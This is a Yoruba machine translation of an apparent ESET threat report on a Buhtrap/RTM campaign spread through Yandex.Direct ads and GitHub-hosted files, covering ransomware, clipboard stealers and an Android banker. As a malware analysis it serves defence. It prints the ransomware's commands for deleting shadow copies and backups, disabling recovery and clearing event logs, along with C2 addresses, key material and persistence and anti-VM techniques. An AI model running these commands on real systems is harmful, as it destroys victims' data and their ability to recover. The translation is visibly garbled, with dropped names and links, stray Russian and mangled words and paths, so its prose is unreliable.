Lati fojusi awọn oniṣiro ni ikọlu cyber, o le lo awọn iwe iṣẹ ti wọn wa lori ayelujara. Eyi jẹ aijọju ohun ti ẹgbẹ cyber kan ti n ṣe ni awọn oṣu diẹ sẹhin, pinpin awọn ẹhin mọto. и , bakanna bi awọn olupilẹṣẹ ati sọfitiwia fun jija awọn owo iworo. Pupọ awọn ibi-afẹde wa ni Russia. A ṣe ikọlu naa nipasẹ gbigbe ipolowo irira lori Yandex.Direct. Awọn olufaragba ti o pọju ni a darí si oju opo wẹẹbu kan nibiti wọn ti beere lọwọ wọn lati ṣe igbasilẹ faili irira kan ti o parada bi awoṣe iwe. Yandex yọ ipolowo irira kuro lẹhin ikilọ wa.
Koodu orisun Buhtrap ti jẹ jijo lori ayelujara ni iṣaaju ki ẹnikẹni le lo. A ko ni alaye nipa wiwa koodu RTM.
Ninu ifiweranṣẹ yii a yoo sọ fun ọ bii awọn ikọlu ṣe pin malware nipa lilo Yandex.Direct ati gbalejo lori GitHub. Ifiweranṣẹ naa yoo pari pẹlu itupalẹ imọ-ẹrọ ti malware.
Buhtrap ati RTM ti pada si iṣowo
Mechanism ti itankale ati olufaragba
Awọn ẹru isanwo oriṣiriṣi ti a fi jiṣẹ si awọn olufaragba pin ilana isọdọtun ti o wọpọ. Gbogbo awọn faili irira ti a ṣẹda nipasẹ awọn ikọlu ni a gbe si awọn ibi ipamọ GitHub oriṣiriṣi meji.
Ni deede, ibi ipamọ naa ni faili irira kan ti o ṣe igbasilẹ ninu, eyiti o yipada nigbagbogbo. Niwọn igba ti GitHub ngbanilaaye lati wo itan-akọọlẹ awọn ayipada si ibi ipamọ kan, a le rii kini malware ti pin lakoko akoko kan. Lati parowa fun olufaragba lati ṣe igbasilẹ faili irira, oju opo wẹẹbu blanki-shabloni24[.]ru, ti o han ni nọmba loke, ni a lo.
Apẹrẹ ti aaye naa ati gbogbo awọn orukọ ti awọn faili irira tẹle ero kan - awọn fọọmu, awọn awoṣe, awọn adehun, awọn apẹẹrẹ, bbl Ni imọran pe Buhtrap ati sọfitiwia RTM ti lo tẹlẹ ninu awọn ikọlu lori awọn oniṣiro ni igba atijọ, a ro pe nwon.Mirza ni titun ipolongo jẹ kanna. Ibeere nikan ni bawo ni olufaragba naa ṣe de aaye awọn ikọlu naa.
Ikolu
O kere ju ọpọlọpọ awọn olufaragba ti o ni agbara ti o pari lori aaye yii ni ifamọra nipasẹ ipolowo irira. Ni isalẹ jẹ apẹẹrẹ URL:
https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456
Bi o ti le ri lati ọna asopọ, asia naa ti fiweranṣẹ lori apejọ iṣiro ẹtọ bb.f2[.]kz. O ṣe pataki lati ṣe akiyesi pe awọn asia han lori awọn aaye oriṣiriṣi, gbogbo wọn ni id ipolongo kanna (blanki_rsya), ati julọ ti o ni ibatan si ṣiṣe iṣiro tabi awọn iṣẹ iranlọwọ ofin. URL naa fihan pe olufaragba ti o pọju lo ibeere naa “fọọmu risiti ṣe igbasilẹ,” eyiti o ṣe atilẹyin idawọle wa ti awọn ikọlu ìfọkànsí. Ni isalẹ wa awọn aaye nibiti awọn asia ti han ati awọn ibeere wiwa ti o baamu.
- gbaa lati ayelujara risiti fọọmu – bb.f2[.] kz
- sample guide - Ipopen[.] ru
- ohun elo ẹdun ayẹwo - 77metrov[.] ru
- fọọmu adehun - òfo-dogovor-kupli-prodazhi[.]ru
- ẹbẹ ejo ayẹwo - zen.yandex[.] ru
- ẹdun ayẹwo - yurday[.] ru
- awọn fọọmu adehun ayẹwo - Regforum[.] ru
- fọọmu adehun – assistentus[.]ru
- ayẹwo iyẹwu adehun - napravah[.] com
- awọn ayẹwo ti awọn adehun ofin - avito[.] ru
Aaye blanki-shabloni24[.] ru le ti jẹ tunto lati ṣe igbelewọn wiwo ti o rọrun. Ni deede, ipolowo kan ti o tọka si aaye ti o n wo alamọdaju pẹlu ọna asopọ si GitHub ko dabi ohun ti o han gbangba buburu. Ni afikun, awọn ikọlu kojọpọ awọn faili irira si ibi ipamọ nikan fun akoko to lopin, o ṣee ṣe lakoko ipolongo naa. Ni ọpọlọpọ igba, ibi ipamọ GitHub ni ibi ipamọ zip ti o ṣofo tabi faili EXE ofo kan ninu. Nitorinaa, awọn ikọlu le pin kaakiri ipolowo nipasẹ Yandex.Direct lori awọn aaye ti o ṣee ṣe pupọ julọ nipasẹ awọn oniṣiro ti o wa ni idahun si awọn ibeere wiwa kan pato.
Nigbamii, jẹ ki a wo ọpọlọpọ awọn ẹru isanwo ti a pin ni ọna yii.
Payload Analysis
Chronology ti pinpin
Ipolongo irira bẹrẹ ni opin Oṣu Kẹwa 2018 ati pe o ṣiṣẹ ni akoko kikọ. Niwọn bi gbogbo ibi-ipamọ naa ti wa ni gbangba lori GitHub, a ṣe akopọ aago deede ti pinpin awọn idile malware mẹfa ti o yatọ (wo nọmba ni isalẹ). A ti ṣafikun laini kan ti n ṣafihan nigbati ọna asopọ asia ti ṣe awari, bi iwọn nipasẹ ESET telemetry, fun lafiwe pẹlu itan-akọọlẹ git. Bii o ti le rii, eyi ni ibamu daradara pẹlu wiwa ti fifuye isanwo lori GitHub. Iyatọ ti o wa ni opin Kínní ni a le ṣe alaye nipasẹ otitọ pe a ko ni apakan ti itan iyipada nitori pe a ti yọ ibi ipamọ kuro lati GitHub ṣaaju ki a to le gba ni kikun.
olusin 1. Chronology ti malware pinpin.
Awọn iwe-ẹri Ibuwọlu koodu
Ipolongo naa lo awọn iwe-ẹri pupọ. Diẹ ninu awọn ti fowo si nipasẹ diẹ ẹ sii ju ọkan ẹbi malware lọ, eyiti o tọka siwaju pe awọn apẹẹrẹ oriṣiriṣi jẹ ti ipolongo kanna. Pelu wiwa ti bọtini ikọkọ, awọn oniṣẹ ko fi eto fowo si awọn alakomeji ati pe ko lo bọtini fun gbogbo awọn ayẹwo. Ni ipari Kínní ọdun 2019, awọn ikọlu bẹrẹ ṣiṣẹda awọn ibuwọlu ti ko tọ ni lilo ijẹrisi ti Google kan eyiti wọn ko ni bọtini ikọkọ.
Gbogbo awọn iwe-ẹri ti o ni ipa ninu ipolongo ati awọn idile malware ti wọn fowo si jẹ atokọ ni tabili ni isalẹ.
A tun ti lo awọn iwe-ẹri iforukọsilẹ koodu wọnyi lati fi idi awọn ọna asopọ mulẹ pẹlu awọn idile malware miiran. Fun ọpọlọpọ awọn iwe-ẹri, a ko rii awọn ayẹwo ti a ko pin nipasẹ ibi ipamọ GitHub kan. Sibẹsibẹ, iwe-ẹri TOV "MARIYA" ni a lo lati wole malware ti o jẹ ti botnet , adware ati awọn miners. Ko ṣeeṣe pe malware yii ni ibatan si ipolongo yii. O ṣeese julọ, ijẹrisi naa ti ra lori darknet.
Win32/Filecoder.Buhtrap
Ẹya akọkọ ti o mu akiyesi wa ni Win32/Filecoder.Buhtrap tuntun ti a ṣe awari. Eyi jẹ faili alakomeji Delphi ti o jẹ akopọ nigbakan. O ti pin ni akọkọ ni Kínní – Oṣu Kẹta ọdun 2019. O huwa bi o ṣe yẹ eto ransomware - o wa awọn awakọ agbegbe ati awọn folda nẹtiwọọki ati fifipamọ awọn faili ti a rii. Ko nilo asopọ Intanẹẹti lati gbogun nitori ko kan si olupin lati firanṣẹ awọn bọtini fifi ẹnọ kọ nkan. Dipo, o ṣe afikun “àmi” si opin ifiranṣẹ irapada, o si daba lilo imeeli tabi Bitmessage lati kan si awọn oniṣẹ.
Lati encrypt bi ọpọlọpọ awọn ohun elo ifura bi o ti ṣee ṣe, Filecoder.Buhtrap nṣiṣẹ o tẹle ara ti a ṣe lati ku sọfitiwia bọtini ti o le ni awọn oluṣakoso faili ṣiṣi ti o ni alaye to niyelori ti o le dabaru pẹlu fifi ẹnọ kọ nkan. Awọn ilana ibi-afẹde jẹ nipataki awọn eto iṣakoso data data (DBMS). Ni afikun, Filecoder.Buhtrap npa awọn faili log ati awọn afẹyinti lati jẹ ki imularada data nira. Lati ṣe eyi, ṣiṣe awọn iwe afọwọkọ ipele ni isalẹ.
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
Filecoder.Buhtrap nlo iṣẹ ori ayelujara IP Logger ti o tọ ti a ṣe apẹrẹ lati gba alaye nipa awọn alejo aaye ayelujara. Eyi ni ipinnu lati tọpa awọn olufaragba ti ransomware, eyiti o jẹ ojuṣe laini aṣẹ:
mshta.exe "javascript:document.write('');"
Awọn faili fun ìsekóòdù ti yan ti wọn ko ba baramu awọn atokọ iyasoto mẹta. Ni akọkọ, awọn faili pẹlu awọn amugbooro wọnyi ko jẹ fifipamọ: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys ati .adan. Ni ẹẹkeji, gbogbo awọn faili fun eyiti ọna kikun ni awọn okun liana ninu atokọ ti o wa ni isalẹ ti yọkuro.
.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel
Ẹkẹta, awọn orukọ faili kan tun yọkuro lati fifi ẹnọ kọ nkan, laarin wọn orukọ faili ti ifiranṣẹ irapada naa. Awọn akojọ ti wa ni gbekalẹ ni isalẹ. O han ni, gbogbo awọn imukuro wọnyi ni a pinnu lati jẹ ki ẹrọ naa ṣiṣẹ, ṣugbọn pẹlu iwọntunwọnsi opopona.
boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe
Ilana fifi ẹnọ kọ nkan faili
Ni kete ti a ti ṣiṣẹ, malware n ṣe agbekalẹ bata bọtini RSA 512-bit kan. Olupilẹṣẹ ikọkọ (d) ati modulus (n) lẹhinna jẹ fifi ẹnọ kọ nkan pẹlu koodu lile 2048-bit ti gbogbo eniyan (oluwa gbangba ati modulus), ti kojọpọ zlib, ati koodu base64. Awọn koodu lodidi fun eyi ti han ni Figure 2.
olusin 2. Abajade ti Hex-Rays decompilation ti 512-bit RSA bọtini iran bata.
Ni isalẹ jẹ apẹẹrẹ ti ọrọ itele pẹlu bọtini ikọkọ ti ipilẹṣẹ, eyiti o jẹ ami-ami ti a so mọ ifiranṣẹ irapada naa.
DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239
Bọtini gbangba ti awọn ikọlu ni a fun ni isalẹ.
e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD
Awọn faili ti wa ni ìpàrokò nipa lilo AES-128-CBC pẹlu kan 256-bit bọtini. Fun faili fifi ẹnọ kọ nkan kọọkan, bọtini titun kan ati fekito ipilẹṣẹ tuntun ti wa ni ipilẹṣẹ. Alaye bọtini ti wa ni afikun si opin faili ti paroko. Jẹ ki ká ro awọn kika ti awọn ìpàrokò faili.
Awọn faili ti paroko ni akọsori wọnyi:
Awọn data faili orisun pẹlu afikun ti iye idan VEGA jẹ ti paroko si awọn baiti 0x5000 akọkọ. Gbogbo alaye decryption ni a so mọ faili kan pẹlu eto atẹle:
- Afihan iwọn faili ni aami kan ti o nfihan boya faili naa tobi ju 0x5000 awọn baiti ni iwọn
- Bọtini Bọtini AES = ZlibCompress (RSAEncrypt (bọtini AES + IV, bọtini gbogbo eniyan ti bata bọtini RSA ti ipilẹṣẹ))
- Bọtini Bọtini RSA = ZlibCompress(RSAEncrypt(bọtini ikọkọ RSA ti ipilẹṣẹ, bọtini RSA ti o ni koodu lile))
Win32/ClipBanker
Win32/ClipBanker jẹ paati kan ti o pin kaakiri lati pẹ Oṣu Kẹwa si ibẹrẹ Oṣu kejila ọdun 2018. Ipa rẹ ni lati ṣe atẹle awọn akoonu ti agekuru agekuru, o wa awọn adirẹsi ti awọn apamọwọ cryptocurrency. Lẹhin ti pinnu adirẹsi apamọwọ ibi-afẹde, ClipBanker rọpo rẹ pẹlu adirẹsi ti a gbagbọ pe o jẹ ti awọn oniṣẹ. Awọn ayẹwo ti a ṣe ayẹwo ko ni apoti tabi pabo. Ọna kan ṣoṣo ti a lo lati boju-boju ihuwasi jẹ fifi ẹnọ kọ nkan okun. Awọn adirẹsi apamọwọ oniṣẹ jẹ fifi ẹnọ kọ nkan nipa lilo RC4. Awọn owo nẹtiwoye ibi-afẹde jẹ Bitcoin, owo Bitcoin, Dogecoin, Ethereum ati Ripple.
Ni akoko ti malware ti ntan si awọn apamọwọ Bitcoin awọn ti o kọlu, iye diẹ ti a fi ranṣẹ si VTS, eyi ti o ṣe iyemeji lori aṣeyọri ti ipolongo naa. Ni afikun, ko si ẹri lati daba pe awọn iṣowo wọnyi ni ibatan si ClipBanker rara.
Win32/RTM
Awọn paati Win32/RTM ti pin fun ọpọlọpọ awọn ọjọ ni ibẹrẹ Oṣu Kẹta ọdun 2019. RTM jẹ banki Tirojanu kan ti a kọ ni Delphi, ti o ni ero si awọn eto ile-ifowopamọ latọna jijin. Ni ọdun 2017, awọn oniwadi ESET ṣe atẹjade ti eto yii, apejuwe naa tun jẹ pataki. Ni Oṣu Kini ọdun 2019, Awọn nẹtiwọki Palo Alto tun tu silẹ .
Buhtrap agberu
Fun igba diẹ, olugbasilẹ kan wa lori GitHub ti ko jọra si awọn irinṣẹ Buhtrap iṣaaju. O yipada si https://94.100.18[.]67/RSS.php?<some_id> lati gba ipele ti o tẹle ati gbejade taara sinu iranti. A le ṣe iyatọ awọn ihuwasi meji ti koodu ipele keji. Ni URL akọkọ, RSS.php ti kọja ẹhin Buhtrap taara - ẹhin ẹhin yii jọra pupọ si eyi ti o wa lẹhin ti koodu orisun ti jo.
O yanilenu, a rii ọpọlọpọ awọn ipolongo pẹlu Buhtrap backdoor, ati pe wọn jẹ ẹsun nipasẹ awọn oniṣẹ oriṣiriṣi. Ni ọran yii, iyatọ akọkọ ni pe ẹnu-ọna ẹhin ti kojọpọ taara sinu iranti ati pe ko lo ero deede pẹlu ilana imuṣiṣẹ DLL ti a sọrọ nipa rẹ. . Ni afikun, awọn oniṣẹ yipada bọtini RC4 ti a lo lati encrypt ijabọ nẹtiwọki si olupin C&C. Ninu ọpọlọpọ awọn ipolongo ti a ti rii, awọn oniṣẹ ko ṣe wahala iyipada bọtini yii.
Iwa keji, ti o ni idiwọn diẹ sii ni pe URL RSS.php ti kọja si agberu miiran. O ṣe imuse diẹ ninu awọn obfuscation, gẹgẹbi atunṣeto tabili agbewọle ti o ni agbara. Idi ti bootloader ni lati kan si olupin C&C [.]com/api/F27F84EDA4D13B15/2, fi awọn àkọọlẹ ati ki o duro fun a esi. O ṣe ilana idahun bi blob, gbe e sinu iranti ati ṣiṣe rẹ. Ẹru isanwo ti a rii ti n ṣiṣẹ agberu yii jẹ ile ẹhin Buhtrap kanna, ṣugbọn awọn paati miiran le wa.
Android/Spy.Banker
O yanilenu, paati kan fun Android ni a tun rii ni ibi ipamọ GitHub. O wa ni ẹka akọkọ fun ọjọ kan nikan - Oṣu kọkanla ọjọ 1, ọdun 2018. Yato si fifiweranṣẹ lori GitHub, telemetry ESET ko rii ẹri ti pinpin malware yii.
Awọn paati ti a ti gbalejo bi Android Ohun elo Package (APK). O ti wa ni darale obfuscated. Iwa irira ti wa ni pamọ sinu JAR ti paroko ti o wa ni apk. O jẹ fifipamọ pẹlu RC4 ni lilo bọtini yii:
key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]
Bọtini kanna ati algorithm ni a lo lati encrypt awọn gbolohun ọrọ. JAR wa ninu APK_ROOT + image/files. Awọn baiti 4 akọkọ ti faili naa ni ipari ti JAR ti paroko, eyiti o bẹrẹ lẹsẹkẹsẹ lẹhin aaye ipari.
Lehin ti o ti pa faili naa kuro, a ṣe awari pe o jẹ Anubis - tẹlẹ banki fun Android. malware ni awọn ẹya wọnyi:
- gbohungbohun gbigbasilẹ
- yiya awọn sikirinisoti
- gbigba GPS ipoidojuko
- keylogger
- ìsekóòdù data ẹrọ ati irapada eletan
- fifiranṣẹ spam
O yanilenu, oṣiṣẹ banki lo Twitter bi ikanni ibaraẹnisọrọ afẹyinti lati gba olupin C&C miiran. Ayẹwo ti a ṣe atupale lo akọọlẹ @JonesTrader, ṣugbọn ni akoko itupalẹ o ti dina tẹlẹ.
Oluṣowo banki ni atokọ ti awọn ohun elo ibi-afẹde lori ẹrọ Android naa. O gun ju atokọ ti a gba ninu iwadi Sophos. Atokọ naa pẹlu ọpọlọpọ awọn ohun elo ile-ifowopamọ, awọn eto rira ori ayelujara gẹgẹbi Amazon ati eBay, ati awọn iṣẹ cryptocurrency.
MSIL/ClipBanker.IH
Apakan ti o kẹhin ti o pin gẹgẹbi apakan ti ipolongo yii ni .NET Windows executable, eyiti o han ni Oṣu Kẹta ọdun 2019. Pupọ julọ awọn ẹya ti a ṣe iwadi ni a ṣajọpọ pẹlu ConfuserEx v1.0.0. Bii ClipBanker, paati yii nlo agekuru agekuru. Ibi-afẹde rẹ ni ọpọlọpọ awọn owo nẹtiwoki, ati awọn ipese lori Steam. Ni afikun, o nlo iṣẹ IP Logger lati ji bọtini WIF ikọkọ Bitcoin.
Awọn ilana Idaabobo
Ni afikun si awọn anfani ti ConfuserEx n pese ni idilọwọ ṣiṣatunṣe, idalenu, ati fifọwọ ba, paati pẹlu agbara lati ṣawari awọn ọja ọlọjẹ ati awọn ẹrọ foju.
Lati rii daju pe o nṣiṣẹ ninu ẹrọ foju kan, malware nlo laini aṣẹ Windows WMI ti a ṣe sinu rẹ (WMIC) lati beere alaye BIOS, eyun:
wmic bios
Lẹhinna eto naa ṣe atunjade iṣẹjade aṣẹ ati pe o wa awọn koko-ọrọ: VBOX, VirtualBox, XEN, qemu, bochs, VM.
Lati ṣe awari awọn ọja ọlọjẹ, malware fi ibeere ranṣẹ si Ile-iṣẹ Aabo Windows kan (WMI) kan nipa lilo ManagementObjectSearcher API bi a ṣe han ni isalẹ. Lẹhin iyipada lati base64 ipe naa dabi eyi:
ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')
olusin 3. Ilana fun idamo antivirus awọn ọja.
Ni afikun, malware ṣayẹwo boya , Ohun elo lati daabobo lodi si awọn ikọlu agekuru agekuru ati, ti o ba nṣiṣẹ, da gbogbo awọn okun duro ni ilana yẹn, nitorinaa mu aabo kuro.
Ifarada
Ẹya malware ti a ṣe iwadi awọn ẹda funrararẹ sinu %APPDATA%googleupdater.exe o si ṣeto abuda “farasin” fun itọsọna google. Lẹhinna o yipada iye naa SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell ni Windows iforukọsilẹ ati ki o ṣe afikun ona updater.exe. Ni ọna yii, malware yoo ṣiṣẹ ni gbogbo igba ti olumulo ba wọle.
Iwa irira
Bii ClipBanker, malware n ṣe abojuto awọn akoonu ti agekuru agekuru ati wa awọn adirẹsi apamọwọ cryptocurrency, ati nigbati o ba rii, rọpo pẹlu ọkan ninu awọn adirẹsi oniṣẹ. Ni isalẹ ni atokọ ti awọn adirẹsi ibi-afẹde ti o da lori ohun ti o rii ninu koodu naa.
BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL
Fun iru adirẹsi kọọkan ni ikosile deede ti o baamu. Iye STEAM_URL ni a lo lati kọlu eto Steam, bi a ṣe le rii lati ikosile deede ti o lo lati ṣalaye ninu ifipamọ:
b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b
Exfiltration ikanni
Ni afikun si rirọpo awọn adirẹsi ni ifipamọ, malware fojusi awọn bọtini WIF ikọkọ ti Bitcoin, Bitcoin Core ati Electrum Bitcoin Woleti. Eto naa nlo plogger.org gẹgẹbi ikanni exfiltration lati gba bọtini ikọkọ WIF. Lati ṣe eyi, awọn oniṣẹ ṣafikun data bọtini ikọkọ si akọsori olumulo-Aṣoju HTTP, bi a ṣe han ni isalẹ.
olusin 4. IP Logger console pẹlu o wu data.
Awọn oniṣẹ ko lo iplogger.org to exfilt awọn apamọwọ. O ṣee ṣe pe wọn lo ọna ti o yatọ nitori opin ohun kikọ 255 ni aaye naa User-Agentti o han ni wiwo oju opo wẹẹbu IP Logger. Ninu awọn ayẹwo ti a ṣe iwadi, olupin ti njade miiran ti wa ni ipamọ ni iyipada ayika DiscordWebHook. Iyalenu, iyipada ayika yii ko ni sọtọ nibikibi ninu koodu naa. Eyi ṣe imọran pe malware ṣi wa labẹ idagbasoke ati pe a ti yan oniyipada si ẹrọ idanwo oniṣẹ.
Ami miiran wa ti eto naa wa ni idagbasoke. Faili alakomeji pẹlu awọn URL meji iplogger.org, ati pe awọn mejeeji ni ibeere nigbati data ba jẹ exfiltrated. Ni ibeere si ọkan ninu awọn URL wọnyi, iye ti o wa ninu aaye Olutọka jẹ iṣaaju nipasẹ “DEV /”. A tun rii ẹya kan ti a ko ṣajọpọ nipa lilo ConfuserEx, olugba fun URL yii ni orukọ DevFeedbackUrl. Da lori orukọ oniyipada ayika, a gbagbọ pe awọn oniṣẹ n gbero lati lo Discord iṣẹ abẹ ati eto idawọle wẹẹbu rẹ lati ji awọn apamọwọ cryptocurrency.
ipari
Ipolowo yii jẹ apẹẹrẹ ti lilo awọn iṣẹ ipolowo abẹ ni awọn ikọlu cyber. Eto naa dojukọ awọn ẹgbẹ Russia, ṣugbọn kii yoo yà wa lati rii iru ikọlu ni lilo awọn iṣẹ ti kii ṣe ti ara ilu Russia. Lati yago fun adehun, awọn olumulo gbọdọ ni igboya ninu orukọ orisun ti sọfitiwia ti wọn ṣe igbasilẹ.
Atokọ pipe ti awọn afihan ti adehun ati awọn abuda MITER ATT&CK wa ni .
orisun: www.habr.com